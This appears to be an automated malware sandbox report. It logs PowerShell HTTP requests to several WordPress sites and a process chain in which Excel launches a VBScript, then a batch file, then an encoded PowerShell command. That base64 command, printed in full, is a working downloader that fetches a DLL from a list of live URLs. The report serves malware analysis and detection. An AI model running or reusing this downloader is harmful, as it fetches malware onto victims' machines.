2024-11-07 17:30:11 UTC	172	OUT	GET /wp-content/NR/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: pardiskood.com Connection: Keep-Alive
2024-11-07 17:30:11 UTC	902	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 17:30:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff referrer-policy: same-origin cross-origin-opener-policy: same-origin cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xGjzZHDR40vBo%2BUltqLFUsgXpIf8i6jVAlr%2BIMz%2BZQBn9LmDdxjSsWw%2BVgdXpS87fPGVKYCbQlhT3m7KB6LQVJe%2BnlYNMUjP8g9lVCOsaUJnjH76mU2aLfet6qinZi0XZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8def0cbbe9e2e71e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1234&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=786&delivery_rate=2271372&cwnd=235&unsent_bytes=0&cid=e944020836280335&ts=436&x=0"
2024-11-07 17:30:11 UTC	185	IN	Data Raw: 62 33 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: b3<!doctype html><html lang="en"><head> <title>Not Found</title></head><body> <h1>Not Found</h1><p>The requested resource was not found on this server.</p></body></html>
2024-11-07 17:30:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49185	3.33.130.190	443	3688	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:30:12 UTC	183	OUT	GET /wp-includes/63De/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: daujimaharajmandir.org Connection: Keep-Alive
2024-11-07 17:30:12 UTC	121	IN	HTTP/1.1 200 OK Content-Type: text/html Date: Thu, 07 Nov 2024 17:30:12 GMT Content-Length: 114 Connection: close
2024-11-07 17:30:12 UTC	114	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49186	63.250.43.9	443	3688	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 17:30:13 UTC	175	OUT	GET /wp-includes/Zkj4QO/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: datasits.com Connection: Keep-Alive
2024-11-07 17:30:13 UTC	703	IN	HTTP/1.1 200 OK server: nginx date: Thu, 07 Nov 2024 07:31:14 GMT content-type: text/html; charset=UTF-8 vary: Accept-Encoding link: <https://datasits.com/index.php?rest_route=/>; rel="https://api.w.org/" link: <https://datasits.com/index.php?rest_route=/wp/v2/pages/9>; rel="alternate"; title="JSON"; type="application/json" link: <https://datasits.com/>; rel=shortlink x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block cache-control: public referrer-policy: strict-origin-when-cross-origin x-cacheable: YES age: 35938 accept-ranges: bytes x-cache: HIT content-length: 137999 strict-transport-security: max-age=15768000 connection: close
2024-11-07 17:30:13 UTC	13817	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 74 69 74 6c 65 3e 44 61 74 61 20 53 71 75 61 72 65 20 66 6f 72 20 49 54 20 53 6f 6c 75 74 69 6f 6e 73 20 26 23 38 32 31 31 3b 20 54 6f 67 65 74 68 65 72 2c 20 77 65 20 6d 61 6b 65 20 6f Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Data Square for IT Solutions – Together, we make o
2024-11-07 17:30:13 UTC	16320	IN	Data Raw: 74 6f 3b 7d 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 20 2e 61 73 74 2d 70 61 67 69 6e 61 74 69 6f 6e 20 7b 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 7d 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 20 2e 65 6e 74 72 79 2d 68 65 61 64 65 72 2e 61 73 74 2d 6e 6f 2d 74 69 74 6c 65 2e 61 73 74 2d 6e 6f 2d 74 68 75 6d 62 6e 61 69 6c 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 7d 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 20 2e 65 6e 74 72 79 2d 68 65 61 64 65 72 2e 61 73 74 2d 68 65 61 64 65 72 2d 77 69 74 68 6f 75 74 2d 6d 61 72 6b 75 70 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 7d 2e 61 73 74 2d 70 Data Ascii: to;}.ast-page-builder-template .ast-pagination {padding: 2em;}.ast-page-builder-template .entry-header.ast-no-title.ast-no-thumbnail {margin-top: 0;}.ast-page-builder-template .entry-header.ast-header-without-markup {margin-top: 0;margin-bottom: 0;}.ast-p
2024-11-07 17:30:13 UTC	12640	IN	Data Raw: 7b 6d 61 78 2d 77 69 64 74 68 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 63 75 73 74 6f 6d 2d 2d 61 73 74 2d 63 6f 6e 74 65 6e 74 2d 77 69 64 74 68 2d 73 69 7a 65 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 64 61 74 61 2d 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 3e 20 2e 61 6c 69 67 6e 77 69 64 65 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 63 75 73 74 6f 6d 2d 2d 61 73 74 2d 77 69 64 65 2d 77 69 64 74 68 2d 73 69 7a 65 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 64 61 74 61 2d 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 2e 61 6c 69 67 6e 66 75 6c 6c 20 7b 6d 61 78 2d 77 69 64 74 Data Ascii: {max-width: var(--wp--custom--ast-content-width-size);margin-left: auto;margin-right: auto;}.entry-content[data-ast-blocks-layout] > .alignwide {max-width: var(--wp--custom--ast-wide-width-size);}.entry-content[data-ast-blocks-layout] .alignfull {max-widt
2024-11-07 17:30:13 UTC	16320	IN	Data Raw: 69 74 65 6d 7b 77 69 64 74 68 3a 61 75 74 6f 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 68 65 61 64 69 6e 67 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 3a 30 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 20 2e 61 73 74 2d 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 63 6f 6c 6f 72 3a 75 6e 73 65 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 6e 73 65 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 67 72 69 64 2d 69 74 65 6d 2e 68 65 6e 74 72 79 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 65 6c 65 6d 65 6e Data Ascii: item{width:auto;}.elementor-widget-heading .elementor-heading-title{margin:0;}.elementor-page .ast-menu-toggle{color:unset !important;background:unset !important;}.elementor-post.elementor-grid-item.hentry{margin-bottom:0;}.woocommerce div.product .elemen
2024-11-07 17:30:13 UTC	5448	IN	Data Raw: 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d Data Ascii: nd-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset-
2024-11-07 17:30:13 UTC	1448	IN	Data Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e Data Ascii: wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}:root :where(.wp-block-pullquote){font-size: 1.
2024-11-07 17:30:13 UTC	16320	IN	Data Raw: 73 68 65 65 74 27 20 69 64 3d 27 65 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 61 64 65 49 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 73 69 74 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 6c 69 62 2f 61 6e 69 6d 61 74 69 6f 6e 73 2f 73 74 79 6c 65 73 2f 66 61 64 65 49 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 69 64 67 65 74 2d 69 6d 61 67 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 73 69 74 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 65 6c Data Ascii: sheet' id='e-animation-fadeIn-css' href='https://datasits.com/wp-content/plugins/elementor/assets/lib/animations/styles/fadeIn.min.css?ver=3.24.3' media='all' /><link rel='stylesheet' id='widget-image-css' href='https://datasits.com/wp-content/plugins/el
2024-11-07 17:30:14 UTC	9880	IN	Data Raw: 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 30 39 22 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 68 66 65 2d 63 72 65 61 74 69 76 65 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 73 69 74 73 2e 63 6f 6d 2f 3f 70 61 67 65 5f 69 64 3d 31 37 36 33 22 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6c 61 73 73 20 3d 20 22 68 66 65 2d 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 22 3e 4c 69 6e 75 78 20 55 62 75 6e 74 75 20 53 65 72 76 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 Data Ascii: <li id="menu-item-2109" itemprop="name" class="menu-item menu-item-type-post_type menu-item-object-page hfe-creative-menu"><a href="https://datasits.com/?page_id=1763" itemprop="url" class = "hfe-sub-menu-item">Linux Ubuntu Server</a></li><li id="menu-i
2024-11-07 17:30:14 UTC	6456	IN	Data Raw: 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 68 32 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 64 65 66 61 75 6c 74 22 3e 51 55 41 4c 49 54 59 3c 2f 68 32 3e 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 62 61 62 66 39 61 63 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 74 65 78 74 2d 65 64 69 74 6f 72 22 20 64 61 74 61 2d 69 64 3d 22 62 61 62 66 39 61 63 22 20 64 61 74 Data Ascii: ss="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">QUALITY</h2></div></div><div class="elementor-element elementor-element-babf9ac elementor-widget elementor-widget-text-editor" data-id="babf9ac" dat
2024-11-07 17:30:14 UTC	48	IN	Data Raw: 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 36 63 Data Ascii: iv class="elementor-element elementor-element-6c

Target ID:	0
Start time:	12:28:58
Start date:	07/11/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f160000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	12:29:01
Start date:	07/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript c:\programdata\wetidjks.vbs
Imagebase:	0xff030000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:29:01
Start date:	07/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Imagebase:	0x4a190000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:29:01
Start date:	07/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Imagebase:	0x13f950000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:29:24
Start date:	07/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript c:\programdata\wetidjks.vbs
Imagebase:	0xff030000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: cmd.exePID: 3660, Parent PID: 3628

General

Target ID:	7
Start time:	12:29:24
Start date:	07/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Imagebase:	0x4a190000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: powershell.exePID: 3688, Parent PID: 3660

General

Target ID:	9
Start time:	12:29:24
Start date:	07/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0Ad